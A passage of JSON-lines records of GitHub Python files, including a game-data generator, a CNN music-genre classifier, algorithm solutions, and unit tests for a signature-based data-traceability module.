\"11-5-2022\", \"12-5-2022\"]\n horas = [\"8:22:23\", \"9:22:23\", \"10:22:23\", \"11:22:23\", \"12:22:23\", \"13:22:23\", \"14:22:23\"]\n climatologias = [\"Nublado\", \"Soleado\", \"Tormenta\", \"Lluvia\", \"Nieve\", \"Muy Soleado\", \"Calima\"]\n edificios = [\"Ayuntamiento\", \"Museo\", \"Tienda\", \"Peluqueria\", \"Aerodromo\"]\n\n for i in range(isla_count):\n jugadores = []\n vecinos = []\n casas_de_isla = []\n objetos_de_isla = []\n\n edificios_dict_list = []\n\n personajes_dict = [\n {\n \"_id\": \"pj\" + str(personaje_id_count),\n \"nombre\": \"Tom Nook\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 1),\n \"nombre\": \"Canela\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 2),\n \"nombre\": \"Arquimedes\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 3),\n \"nombre\": \"Pili y Mili\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 4),\n \"nombre\": \"Marilin\",\n },\n {\n \"_id\": \"pj\" + str(personaje_id_count + 5),\n \"nombre\": \"Rodri y Rafa\",\n }\n ]\n personaje_id_count += 6\n\n for i in range(len(edificios)):\n\n personajes = []\n if i == 0:\n personajes = [personajes_dict[0], personajes_dict[1]]\n elif i == 1:\n personajes = [personajes_dict[2]]\n elif i == 2:\n personajes = 
[personajes_dict[3]]\n elif i == 3:\n personajes = [personajes_dict[4]]\n elif i == 4:\n personajes = [personajes_dict[5]]\n\n dict = {\n \"_id\": \"ed\" + str(edificio_id_count),\n \"tipo\": edificios[i],\n \"personajes\": personajes,\n\n \"inventarioEdificio\": get_mueble_dict_list(random.randint(0, 5)) +\n get_col_dict_list(random.randint(0, 5)) +\n get_mueble_dict_list(random.randint(0, 5)) +\n get_prop_dict_list(random.randint(0, 5)) +\n get_material_dict_list(random.randint(0, 5)) +\n get_equip_dict_list(random.randint(0, 2))\n }\n\n edificio_id_count += 1\n edificios_dict_list.append(dict)\n\n for i in range(random.randint(2, 8)):\n new_vecino = get_vecino()\n vecinos.append(new_vecino)\n\n casa_id = new_vecino[\"casa\"]\n casas_de_isla.append(casa_id)\n\n # Find casa\n casa = find_casa_by_id(casa_id)\n objetos_de_isla += casa[\"inventarioCasa\"]\n\n for i in range(random.randint(1, 3)):\n new_jugador = get_player()\n\n jugadores.append(new_jugador[\"_id\"])\n\n casas_de_isla.append(new_jugador[\"casa\"])\n\n casa = find_casa_by_id(new_jugador[\"casa\"])\n\n objetos_de_isla.append(casa[\"inventarioCasa\"])\n\n vecinos_copy = vecinos.copy()\n\n for i in range(2, 5):\n if len(vecinos_copy) == 0:\n break\n\n random_index = random.randint(0, len(vecinos_copy) - 1)\n new_vecino = vecinos_copy.pop(random_index)\n\n new_jugador[\"vecinos\"].append({\n \"_id\": new_vecino[\"_id\"],\n \"amistad\": random.randint(1, 10)\n\n })\n\n isla_dict = {\"_id\": \"is\" + str(isla_id_count),\n \"jugadores\": jugadores,\n \"nombre\": nombres[isla_id_count % len(nombres)],\n \"hemisferio\": hemisferios[random.randint(0, len(hemisferios) - 1)],\n \"fecha\": fechas[random.randint(0, len(fechas) - 1)],\n \"hora\": horas[random.randint(0, len(fechas) - 1)],\n \"climatologia\": climatologias[random.randint(0, len(climatologias) - 1)],\n \"edificios\": edificios_dict_list,\n \"inventarioIsla\": objetos_de_isla,\n \"casas\": casas_de_isla,\n \"vecinos\": vecinos\n }\n islas.append(isla_dict)\n isla_id_count += 1\n\n write_file(isla_path, {\"Islas\": islas})\n\n\ndef get_vecino():\n global vecino_id_count\n global all_vecinos\n\n names = [\"Paco\", \"Joshua\", \"Patri\", \"Marcelyn\", \"Apollo\", \"Steacy\", \"Carlos\", \"Queque\", \"Ariel\",\n \"Narciso\", \"Munchi\", \"Morfeo\", \"Rosezna\", \"Luna\", \"Alderia\", \"Adela\", \"Agreste\", \"Alba\",\n \"Albino\", \"Aliste\", \"Cabriola\", \"Cabralex\", \"Cachemir\", \"Camelio\", \"Babu\", \"Bambina\", \"Bayo\",\n \"Bea\", \"Beelen\", \"Belinda\", \"Bella\", \"Benito\", \"Deira\", \"Dentina\", \"Dori\", \"Draco\", \"Dragonio\",\n \"Deivid\", \"Fabiola\", \"Fardilla\", \"Fauna\", \"Feli\", \"Felipe\" \"Gabino\", \"Ganon\", \"Gaston\",\n \"Hanalulu\", \"Hans\", \"Harpo\", \"Isadora\", \"Jacinto\", \"Jacobo\", \"Jaime\", \"Jairo\", \"Kabuki\",\n \"Kaiman\", \"Kasandra\", \"Katia\", \"Lali\", \"Lanolina\", \"Lili\", \"Madam Rosa\", \"Magenta\", \"Marcial\",\n \"Nabar\", \"Nachete\", \"Nana\", \"Narciso\", \"Octavio\", \"Octoberto\", \"Ofelia\", \"Pablo\", \"Paquito\",\n \"Quetzal\", \"Radiolo\", \"Ramina\", \"Sabana\", \"Saltiago\", \"Sanson\", \"Tabita\", \"Talia\", \"Tami\",\n \"Tania\", \"Ulises\", \"Uno\", \"Vacarena\", \"Wanda\", \"Wolfi\", \"Yuka\", \"Zapiron\", \"Zelanda\"\n ]\n\n personalidades = [\"Atletico\", \"Esnob\", \"Grunion\", \"Perezoso\", \"Alegre\", \"Dulce\", \"Presumida\", \"Normal\"]\n\n casa = get_casa()\n\n name_id = vecino_id_count\n if vecino_id_count >= len(names):\n name_id = name_id % len(names)\n\n print(\"Care: Names are repeated!\")\n\n 
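# name_id was wrapped into range above, so it is the safe index into names here\n    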
vecino_dict = {\n        \"_id\": \"vec\" + str(name_id),\n        \"nombre\": names[name_id],\n        \"personalidad\": personalidades[random.randint(0, len(personalidades) - 1)],\n        \"casa\": casa[\"_id\"]\n    }\n    vecino_id_count += 1\n\n    all_vecinos.append(vecino_dict)\n\n    return vecino_dict\n\n\nwrite_islas(5)\n\nwrite_file(objeto_path, {\"Objetos\": all_objects})\nwrite_file(casas_path, {\"Casas\": all_casas})\nwrite_file(jugadores_path, {\"Jugadores\": all_jugadores})\n","repo_name":"hal-9001-v/Gestioncita","sub_path":"Practica 3/mongoWriter.py","file_name":"mongoWriter.py","file_ext":"py","file_size_in_byte":21190,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"30955080064","text":"import os\nimport ntpath\nimport sys\nimport csv\nfrom cnn import cnn\nimport numpy as np\nimport random\nfrom datetime import datetime\nfrom matplotlib import pyplot as plt\n\nPACKAGE_PARENT = '../..'\nSCRIPT_DIR = os.path.dirname(os.path.realpath(os.path.join(os.getcwd(), os.path.expanduser(__file__))))\nsys.path.append(os.path.normpath(os.path.join(SCRIPT_DIR, PACKAGE_PARENT)))\n\nfrom audio_preprocessor import audio_preprocessor as ap\nfrom feature_extractor import feature_extractor as fe\nfrom feature_extractor import feature_type as ft\n\nif __name__ == '__main__':\n\n    # Configure the sizes of the training and testing sets, the number of classes we're matching against, and whether we pick values randomly or sequentially\n    trainingSetSize = 6400\n    testingSetSize = 800\n    classSize = trainingSetSize\n    randomize = False\n\n    myAP = ap()\n    myFE = fe()\n    audioPathList = myAP.list_of_all_audio_files\n    if randomize:\n        random.shuffle(audioPathList)\n    trainTrackID = myFE.get_training_dataset_song_ids()\n    trainDataLst = []\n    trainClassLst = []\n    trainClassStrLst = []\n    trainTrackIDLst = []\n    trainTrackIdStrLst = []\n    classDict = {}\n    nextClassID = 0\n    print('Now loading training data...')\n\n    spectrogramLowestCol = 2147483647\n    spectrogramLowestRow = 2147483647\n    # Load the training data...\n    i = 0\n    for path in audioPathList:\n        trackIDStr = os.path.splitext(ntpath.basename(path))[0]\n        trackIDInt = int(trackIDStr)\n        if os.path.exists(path) and (trackIDInt in trainTrackID):\n            currentClass = myFE.get_genre(trackIDInt)\n            currentClassID = -1\n            if classDict.get(currentClass) == None and len(classDict) < classSize:\n                classDict[currentClass] = nextClassID\n                currentClassID = nextClassID\n                nextClassID += 1\n            elif classDict.get(currentClass) == None and len(classDict) >= classSize:\n                continue\n            else:\n                currentClassID = classDict[currentClass]\n            print('Loading track '+trackIDStr + ' with genre '+currentClass + ' ('+str(i+1)+'/'+str(trainingSetSize)+')')\n            currentSpectrogram = myAP.get_mel_spectrogram_with_cache(path)\n            if(len(currentSpectrogram[0]) < spectrogramLowestCol):\n                spectrogramLowestCol = len(currentSpectrogram[0])\n            if(len(currentSpectrogram) < spectrogramLowestRow):\n                spectrogramLowestRow = len(currentSpectrogram)\n            trainDataLst.append(currentSpectrogram)\n            trainClassStrLst.append(currentClass)\n            trainClassLst.append(currentClassID)\n            trainTrackIDLst.append(trackIDInt)\n            trainTrackIdStrLst.append(trackIDStr)\n            i += 1\n        if i >= trainingSetSize:\n            break\n    print('Training data loaded.')\n\n    # Load the testing data...\n    i = 0\n    print('Now loading testing data...')\n    testTrackID = myFE.get_validation_dataset_song_ids()\n    testDataLst = []\n    testClassLst = []\n    testClassStrLst = []\n    testTrackIdLst = []\n    testTrackIdStrLst = []\n    for path in audioPathList:\n        
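# recover the integer track id from the file name; only tracks in the validation split are kept\n        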
trackIDStr = os.path.splitext(ntpath.basename(path))[0]\n trackIDInt = int(trackIDStr)\n if os.path.exists(path) and (trackIDInt in testTrackID):\n currentClass = myFE.get_genre(trackIDInt)\n currentClassID = -1\n if classDict.get(currentClass) == None:\n continue\n else:\n currentClassID = classDict[currentClass]\n print('Loading track '+trackIDStr + ' with genre '+currentClass + ' ('+str(i+1)+'/'+str(testingSetSize)+')')\n currentSpectrogram = myAP.get_mel_spectrogram_with_cache(path)\n if(len(currentSpectrogram[0]) < spectrogramLowestCol):\n spectrogramLowestCol=len(currentSpectrogram[0])\n if(len(currentSpectrogram) < spectrogramLowestRow):\n spectrogramLowestRow=len(currentSpectrogram)\n\n testDataLst.append(currentSpectrogram)\n testClassStrLst.append(currentClass)\n testClassLst.append(currentClassID)\n testTrackIdLst.append(trackIDInt)\n testTrackIdStrLst.append(trackIDStr)\n i+=1\n if i >= testingSetSize:\n break\n print('Testing data loaded.')\n\n print('Processing data...')\n #Truncate the frame for transformation\n for i in range(0, len(trainDataLst)):\n spectrogram = trainDataLst[i]\n if len(spectrogram[0]) <= spectrogramLowestCol and len(spectrogram) <= spectrogramLowestRow:\n continue;\n while len(spectrogram[0]) > spectrogramLowestCol:\n spectrogram = np.delete(spectrogram, len(spectrogram[0])-1, 1)\n while len(spectrogram) > spectrogramLowestRow:\n spectrogram = np.delete(spectrogram, len(spectrogram)-1, 0)\n trainDataLst[i] = spectrogram\n\n for i in range(0, len(testDataLst)):\n spectrogram = testDataLst[i]\n if len(spectrogram[0]) <= spectrogramLowestCol and len(spectrogram) <= spectrogramLowestRow:\n continue;\n while len(spectrogram[0]) > spectrogramLowestCol:\n spectrogram = np.delete(spectrogram, len(spectrogram[0])-1, 1)\n while len(spectrogram) > spectrogramLowestRow:\n spectrogram = np.delete(spectrogram, len(spectrogram)-1, 0)\n testDataLst[i] = spectrogram\n\n #Transform the format of data into something that can be used\n num_rows = spectrogramLowestRow\n num_columns = spectrogramLowestCol\n num_channels = 1\n trainData = np.array(trainDataLst)\n trainData = trainData.reshape(trainData.shape[0], num_rows, num_columns, num_channels)\n trainClass = np.array(trainClassLst)\n\n testData = np.array(testDataLst)\n testData = testData.reshape(testData.shape[0], num_rows, num_columns, num_channels)\n testClass = np.array(testClassLst)\n\n print('Creating data model...')\n\n myModel = cnn((num_rows, num_columns, num_channels))\n print('Now training model...')\n history=myModel.train(trainData, trainClass)\n acc = history.history['accuracy']\n\n #Evaluate the model using test set. Code modifed based on https://towardsdatascience.com/a-simple-cnn-multi-image-classifier-31c463324fa\n print('Now testing the model we trained...')\n (eval_loss, eval_accuracy) = myModel.test(testData, testClass)\n print(\"[INFO] accuracy: {:.2f}%\".format(eval_accuracy * 100))\n print(\"[INFO] Loss: {}\".format(eval_loss))\n\n #Save the detailed prediction as a csv file - optional. 
Code modified based on https://realpython.com/python-csv/\n    currentTimeStr = datetime.now().strftime(\"%Y%m%d%H%M%S\")\n    reverseclassDict = list(classDict.keys())\n\n    trainPredictedClasses = myModel.predict(trainData)\n    trainPredictedClassesStr = []\n    for classID in trainPredictedClasses:\n        trainPredictedClassesStr.append(reverseclassDict[classID])\n    with open('trainset_prediction_result_'+ currentTimeStr +'.csv', mode='w') as csv_file:\n        fieldnames = ['trackID', 'predictedClass', 'realClass', 'correct']\n        writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n        writer.writeheader()\n        for j in range(0, len(trainTrackIdStrLst)):\n            #print('Track ' + str(testTrackIdLst[j]) + ' has genre ' + testClassStrLst[j] + ' and our model predict it has genre ' + predictedClassesStr[j])\n            writer.writerow({'trackID': trainTrackIdStrLst[j], 'predictedClass': trainPredictedClassesStr[j], 'realClass': trainClassStrLst[j], 'correct': str(trainPredictedClassesStr[j] == trainClassStrLst[j])})\n\n    testPredictedClasses = myModel.predict(testData)\n    testPredictedClassesStr = []\n    for classID in testPredictedClasses:\n        testPredictedClassesStr.append(reverseclassDict[classID])\n    with open('testset_prediction_result_'+ currentTimeStr + '.csv', mode='w') as csv_file:\n        fieldnames = ['trackID', 'predictedClass', 'realClass', 'correct']\n        writer = csv.DictWriter(csv_file, fieldnames=fieldnames)\n\n        writer.writeheader()\n        for j in range(0, len(testTrackIdLst)):\n            #print('Track ' + str(testTrackIdLst[j]) + ' has genre ' + testClassStrLst[j] + ' and our model predict it has genre ' + predictedClassesStr[j])\n            writer.writerow({'trackID': testTrackIdStrLst[j], 'predictedClass': testPredictedClassesStr[j], 'realClass': testClassStrLst[j], 'correct': str(testPredictedClassesStr[j] == testClassStrLst[j])})\n    epochs = range(1, len(acc) + 1)\n    plt.plot(epochs, acc, 'b', label='Training accuracy (with spectrogram)')\n    plt.title('CNN Training accuracy')\n    plt.legend()\n    plt.show()","repo_name":"park1996/Music-Classification-By-Genre","sub_path":"models/cnn/cnn_classification.py","file_name":"cnn_classification.py","file_ext":"py","file_size_in_byte":8678,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"}
{"seq_id":"18493781499","text":"# Creates the database and stores the submitted values in the list. Entries in the data list should each appear on a new line, and the data list should not be overwritten every time.\n# Source *1*\nfrom csv import writer\n\ndef to_csv(data_lst):\n    with open('database.csv', 'a+', newline='', encoding='utf-8') as write_obj:\n        csv_writer = writer(write_obj)\n        csv_writer.writerow(data_lst)\n\n\n# Source *1*: https://realpython.com/python-csv/\n\n","repo_name":"timmordasini32/pro_2","sub_path":"tippspiel/datenbank.py","file_name":"datenbank.py","file_ext":"py","file_size_in_byte":480,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"}
{"seq_id":"40541801600","text":"import os\nimport csv\n\n\nfrom tqdm import tqdm\n\n\ndef load_labels(data_dir, split):\n    with open(os.path.join(data_dir, '{}.csv'.format(split)), 'r') as fp:\n        reader = csv.reader(fp)\n        problems = list(reader)\n    problems = problems[1:]\n    return problems\n\n\ndef load_data(data_dir, split, split_csv):\n    problems = list()\n    for row in tqdm(split_csv):\n        with open(os.path.join(data_dir, split, row[1]), 'r') as fp:\n            problems.append(fp.read())\n    return 
problems\n","repo_name":"AliOsm/AI-SOCO-Experiments","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":494,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"24783991416","text":"\"\"\"\n이중우선순위큐\n\nhttps://school.programmers.co.kr/learn/courses/30/lessons/42628\n\"\"\"\nimport heapq\ndef solution(operations):\n \n removed = []\n min_heap = []\n max_heap = []\n answer = []\n idx = 0\n for o in operations:\n oper, data = o.split()\n if oper == \"I\":\n removed.append([False, int(data)])\n heapq.heappush(min_heap, (int(data), idx))\n heapq.heappush(max_heap, (-int(data), idx))\n idx += 1\n if oper == \"D\":\n if len(min_heap) == 0 or len(max_heap) == 0:\n continue\n if data == \"-1\":\n while min_heap:\n v, i = heapq.heappop(min_heap)\n if removed[i][0] == False:\n removed[i][0] = True\n break\n elif data == \"1\":\n while max_heap:\n v, i = heapq.heappop(max_heap)\n if removed[i][0] == False:\n removed[i][0] = True\n break\n \n candidates = []\n for r in removed:\n if r[0] == False:\n candidates.append(r[1])\n if candidates:\n return [max(candidates), min(candidates)]\n else:\n return [0,0]","repo_name":"dong5854/algorithm","sub_path":"programmers/level3/이중우선순위큐.py","file_name":"이중우선순위큐.py","file_ext":"py","file_size_in_byte":1282,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13284324897","text":"\"\"\"\nGiven a 0-indexed integer array nums of size n containing all numbers from 1 to n, return the number of increasing quadruplets.\nA quadruplet (i, j, k, l) is increasing if:\n\n0 <= i < j < k < l < n, and\nnums[i] < nums[k] < nums[j] < nums[l].\n\nExample 1:\nInput: nums = [1,3,2,4,5]\nOutput: 2\nExplanation:\n- When i = 0, j = 1, k = 2, and l = 3, nums[i] < nums[k] < nums[j] < nums[l].\n- When i = 0, j = 1, k = 2, and l = 4, nums[i] < nums[k] < nums[j] < nums[l].\nThere are no other quadruplets, so we return 2.\n\nExample 2:\nInput: nums = [1,2,3,4]\nOutput: 0\nExplanation: There exists only one quadruplet with i = 0, j = 1, k = 2, l = 3, but since nums[j] < nums[k], we return 0.\n\n\nConstraints:\n4 <= nums.length <= 4000\n1 <= nums[i] <= nums.length\nAll the integers of nums are unique. 
nums is a permutation.\n\nhints:\n1 Can you loop over all possible (j, k) and find the answer?\n2 We can pre-compute all possible (i, j) and (k, l) and store them in 2 matrices.\n3 The answer will the sum of prefix[j][k] * suffix[k][j].\n\nanalysis:\ndp[j] stores the count of all valid triplets (i, j, k) that satisfies i < j < k and nums[i] < nums[k] < nums[j] (132 Pattern) and using the current number in j.\nTC: O(N^2)\n\"\"\"\nfrom typing import List\n\n\nclass CountIncreasingQuadruplets:\n def countQuadruplets(self, nums: List[int]) -> int:\n n = len(nums)\n dp = [0] * n\n res = 0\n for j in range(n):\n prev_small = 0\n for i in range(j):\n if nums[i] < nums[j]: # 2 meets 4\n prev_small += 1\n res += dp[i] # add all 132 patterns count\n elif nums[i] > nums[j]: # 3 meets 2\n dp[i] += prev_small # add all 1?2 patterns count\n return res\n","repo_name":"DeanHe/Practice","sub_path":"LeetCodePython/CountIncreasingQuadruplets.py","file_name":"CountIncreasingQuadruplets.py","file_ext":"py","file_size_in_byte":1755,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"73637124072","text":"import datetime\nimport random\nfrom unittest import TestCase\nimport uuid\n\nimport src.utils.util\nfrom src.utils import encryption_module as em\nimport pandas as pd\nfrom src.traceability_module.traceability_module import TraceabilityModule\nimport os\nimport binascii\n\nfrom src.utils.digital_signature import _get_hash, DigitalSignature\nfrom src.utils.util import registered_data_columns, transferred_data_columns, url_to_manager\n\n\nclass TestTraceabilityModule(TestCase):\n\n def setUp(self) -> None:\n # this method will be executed before EACH test method\n root = 'src'\n prefix = ''\n while not os.path.exists(f'{prefix}{root}'):\n prefix = f'../{prefix}'\n\n path_to_private_keys = f'{prefix}src/keys'\n path_to_public_keys = f'{prefix}src/keys'\n\n # we insert smashhit data into the records\n self.path_to_records_table = \"../../src/utils/records_table.csv\"\n self.table_columns = ['actor', 'uniform_resource_identifier', 'path_to_private_key', 'path_to_public_key']\n if os.path.exists(self.path_to_records_table):\n self.records_df = pd.DataFrame(columns=self.table_columns)\n\n actors = ['sender', 'receiver', 'own_smashhit', 'manager', 'native']\n for present in self.records_df['actor'].to_list():\n actors.remove(present)\n\n # for each actor we assign a random uniform_resource_identifier, private key and public key\n for actor in actors:\n uniform_resource_identifier = uuid.uuid1()\n private_key_filename = f'{uniform_resource_identifier}_ed25519'\n path_to_private_key = f'{path_to_private_keys}/{private_key_filename}'\n public_key_filename = f'{uniform_resource_identifier}_ed25519.pub'\n path_to_public_key = f'{path_to_public_keys}/{public_key_filename}'\n # creation of keys\n private_key = em.generate_private_key()\n em.save_private_key(private_key, path_to_private_key)\n public_key = em.generate_public_key(private_key)\n em.save_public_key(public_key, path_to_public_key)\n # insertion of the new record in table\n new_record = {'actor': actor, 'uniform_resource_identifier': uniform_resource_identifier,\n 'path_to_private_key': path_to_private_key, 'path_to_public_key': path_to_public_key}\n # ignore_index=True to avoid thinking about the index\n self.records_df = self.records_df.append(new_record, ignore_index=True)\n self.records_df = pd.DataFrame(self.records_df, columns=self.table_columns)\n self.records_df.to_csv(self.path_to_records_table, 
index=False)\n else:\n self.records_df = pd.read_csv(self.path_to_records_table)\n\n self.path_to_private_key_sender = self.records_df.loc[0, 'path_to_private_key'] # 0 = position of sender\n self.path_to_public_key_sender = self.records_df.loc[0, 'path_to_public_key']\n self.path_to_private_key_receiver = self.records_df.loc[1, 'path_to_private_key']\n self.path_to_public_key_receiver = self.records_df.loc[1, 'path_to_public_key']\n self.path_to_private_key_manager = self.records_df.loc[3, 'path_to_private_key']\n self.path_to_public_key_manager = self.records_df.loc[3, 'path_to_public_key']\n self.path_to_private_key_native = self.records_df.loc[4, 'path_to_private_key']\n self.path_to_public_key_native = self.records_df.loc[4, 'path_to_public_key']\n self.sender_id = self.records_df.loc[0, 'uniform_resource_identifier']\n self.receiver_id = self.records_df.loc[1, 'uniform_resource_identifier']\n self.manager_id = self.records_df.loc[3, 'uniform_resource_identifier']\n self.native_id = self.records_df.loc[4, 'uniform_resource_identifier']\n self.log_path_registered_data = f'{prefix}src/utils/registered_data.csv'\n self.log_path_transferred_data = f'{prefix}src/utils/transferred_data.csv'\n\n self.data = str.encode(f'this{random.randint(0, 15)}is{random.randint(0, 50)}the{random.randint(0, 1000)}data')\n self.hash_data = _get_hash(self.data)\n self.uniform_resource_identifier = self.native_id # very important\n self.consent_id = uuid.uuid1()\n self.contract_id = str(self.consent_id) + '_contract'\n self.origin = uuid.uuid1()\n\n self.private_key_sender = em.load_private_key(self.path_to_private_key_sender)\n self.public_key_sender = em.load_public_key(self.path_to_public_key_sender)\n\n self.private_key_receiver = em.load_private_key(self.path_to_private_key_receiver)\n self.public_key_receiver = em.load_private_key(self.path_to_public_key_receiver)\n\n self.private_key_manager = em.load_private_key(self.path_to_private_key_manager)\n self.public_key_manager = em.load_public_key(self.path_to_public_key_manager)\n\n date_time_obj = datetime.datetime.strptime('2022-06-10 08:15:27.243860', '%Y-%m-%d %H:%M:%S.%f')\n self.creation_time = date_time_obj.time()\n date_time_obj = datetime.datetime.strptime('2022-06-29 08:15:27.243860', '%Y-%m-%d %H:%M:%S.%f')\n self.expiration_time = date_time_obj.time()\n\n self.log_path_registered_data = f'{prefix}src/utils/registered_data.csv'\n self.log_path_transferred_data = f'{prefix}src/utils/transferred_data.csv'\n\n self.path_to_consents = f'{prefix}src/utils/consents.csv'\n\n def test_register_data(self):\n self.traceability_module = TraceabilityModule(path_to_private_key=self.path_to_private_key_manager,\n path_to_public_key=self.path_to_public_key_manager,\n url_to_manager=url_to_manager,\n own_smashhit_id=str(self.manager_id))\n digital_signature_manager = DigitalSignature(public_key=self.public_key_manager,\n private_key=self.private_key_manager)\n signed_hash_manager = digital_signature_manager.sign_data(self.hash_data)\n signed_hash_manager = binascii.hexlify(signed_hash_manager).decode('ascii')\n result = self.traceability_module.register_data(\n consent_id=str(self.consent_id),\n contract_id=str(self.contract_id),\n hash_data=str(self.hash_data),\n origin=str(self.origin),\n creation_time=self.creation_time,\n expiration_time=self.expiration_time,\n path_to_records_table=self.path_to_records_table\n )\n\n central_signature, uniform_resource_identifier = result[0], result[1]\n\n df = pd.read_csv(self.log_path_registered_data)\n index = len(df) - 
1\n new_uniform_resource_identifier = df.loc[index, 'uniform_resource_identifier']\n\n self.assertTrue((signed_hash_manager == central_signature) &\n (str(uniform_resource_identifier) == new_uniform_resource_identifier))\n\n def test_notify_data_transfer(self):\n self.traceability_module = TraceabilityModule(own_smashhit_id=str(self.sender_id),\n path_to_private_key=self.path_to_private_key_sender,\n path_to_public_key=self.path_to_private_key_sender,\n url_to_manager=url_to_manager)\n # we create a row in registered data containing the sender (first-hop company) hash_data\n hash_data = self.hash_data\n smashhit = src.utils.util.get_record('own_smashhit')\n path_to_private_key_smashhit = smashhit['path_to_private_key']\n path_to_public_key_smashhit = smashhit['path_to_public_key']\n private_key_smashhit = em.load_private_key(path_to_private_key_smashhit)\n public_key_smashhit = em.load_private_key(path_to_public_key_smashhit)\n\n signed_hash = private_key_smashhit.sign(hash_data)\n signed_hash = binascii.hexlify(signed_hash).decode('ascii')\n if os.path.exists(self.log_path_registered_data):\n registered_data_df = pd.read_csv(self.log_path_registered_data)\n else:\n registered_data_df = pd.DataFrame(columns=registered_data_columns)\n new_data = {'smashhit_id': str(self.sender_id),\n 'uniform_resource_identifier': str(self.uniform_resource_identifier),\n 'hash_data': str(hash_data),\n 'signed_hash': str(signed_hash), 'consent_id': str(self.consent_id),\n 'contract_id': str(self.contract_id), 'origin': str(self.origin),\n 'creation_time': str(self.creation_time),\n 'expiration_time': str(self.expiration_time)}\n registered_data_df = registered_data_df.append(new_data, ignore_index=True)\n registered_data_df.to_csv(self.log_path_registered_data, index=False)\n\n data_sender = str(self.uniform_resource_identifier) + str(self.sender_id) + str(self.receiver_id)\n hash_data_sender = _get_hash(data_sender)\n signature_of_sender = self.private_key_sender.sign(hash_data_sender)\n signature_of_sender = binascii.hexlify(signature_of_sender).decode('ascii')\n\n var_msg = self.traceability_module.notify_data_transfer(\n uniform_resource_identifier=str(self.uniform_resource_identifier), receiver_id=str(self.receiver_id))\n\n\n df = pd.read_csv(self.log_path_transferred_data)\n\n index = len(df) - 1\n self.assertTrue(((df.loc[index, 'uniform_resource_identifier'] == str(self.uniform_resource_identifier))) &\n (df.loc[index, 'sender_id'] == str(self.sender_id)) &\n (df.loc[index, 'receiver_id'] == str(self.receiver_id)) &\n (df.loc[index, 'signature_of_sender'] == str(signature_of_sender)))\n\n def test_verify_received_data(self):\n self.traceability_module = TraceabilityModule(own_smashhit_id=str(self.receiver_id),\n path_to_private_key=self.path_to_private_key_receiver,\n path_to_public_key=self.path_to_private_key_receiver,\n url_to_manager=url_to_manager)\n # we create a row in registered data containing the sender (first-hop company) hash_data\n hash_data = self.hash_data\n signed_hash = self.private_key_sender.sign(hash_data)\n signed_hash = binascii.hexlify(signed_hash).decode('ascii')\n if os.path.exists(self.log_path_registered_data):\n registered_data_df = pd.read_csv(self.log_path_registered_data)\n else:\n registered_data_df = pd.DataFrame(columns=registered_data_columns)\n new_data = {'uniform_resource_identifier': self.uniform_resource_identifier, 'hash_data': hash_data,\n 'signed_hash': signed_hash, 'consent_id': self.consent_id, 'contract_id': self.contract_id,\n 'origin': self.origin, 
'creation_time': self.creation_time, 'expiration_time': self.expiration_time}\n registered_data_df = registered_data_df.append(new_data, ignore_index=True)\n registered_data_df.to_csv(self.log_path_registered_data, index=False)\n\n data_sender = _get_hash(str(self.uniform_resource_identifier) + str(self.sender_id) + str(self.receiver_id))\n signature_of_sender = self.private_key_sender.sign(data_sender)\n signature_of_sender = binascii.hexlify(signature_of_sender).decode('ascii')\n\n # we create a row in transferred data containing the transferred data\n data = {\n 'uniform_resource_identifier': self.uniform_resource_identifier,\n 'sender_id': self.sender_id,\n 'receiver_id': self.receiver_id,\n 'signature_of_sender': signature_of_sender,\n 'signature_of_receiver': '',\n 'transfer_date_time': datetime.datetime.now(),\n 'confirm_date_time': ''\n }\n if os.path.exists(self.log_path_transferred_data):\n transferred_data_df = pd.read_csv(self.log_path_transferred_data)\n else:\n transferred_data_df = pd.DataFrame(columns=transferred_data_columns)\n transferred_data_df = transferred_data_df.append(data, ignore_index=True)\n transferred_data_df.to_csv(self.log_path_transferred_data, index=False)\n\n self.assertTrue('' == self.traceability_module.verify_received_data(hash_data=str(hash_data),\n uniform_resource_identifier=str(\n self.uniform_resource_identifier),\n sender_id=str(self.sender_id),\n signature_of_sender=signature_of_sender))\n","repo_name":"uttam1216/DataUseTraceabilty_LUH_UBO","sub_path":"unittests/positive_tests/test_traceability_module.py","file_name":"test_traceability_module.py","file_ext":"py","file_size_in_byte":13105,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36546234217","text":"from LinkedList import LinkedList, create_sample_linked_lists\nimport logging\n\nlogging.basicConfig(level=logging.INFO)\n\n\ndef getNthItem(ll: LinkedList, position: int):\n \"\"\"\n\n :param position:\n :param ll:\n :return:\n\n TC : O(N)\n SC : O(1)\n \"\"\"\n\n if not ll.head:\n logging.info(\"Linked List is empty.\")\n\n return None\n\n temp = ll.head\n index = 1\n\n while temp and index < position:\n temp = temp.next\n index += 1\n\n if index < position:\n logging.info(\"Length of the Linked List is {}. Hence position {} does not exists. 
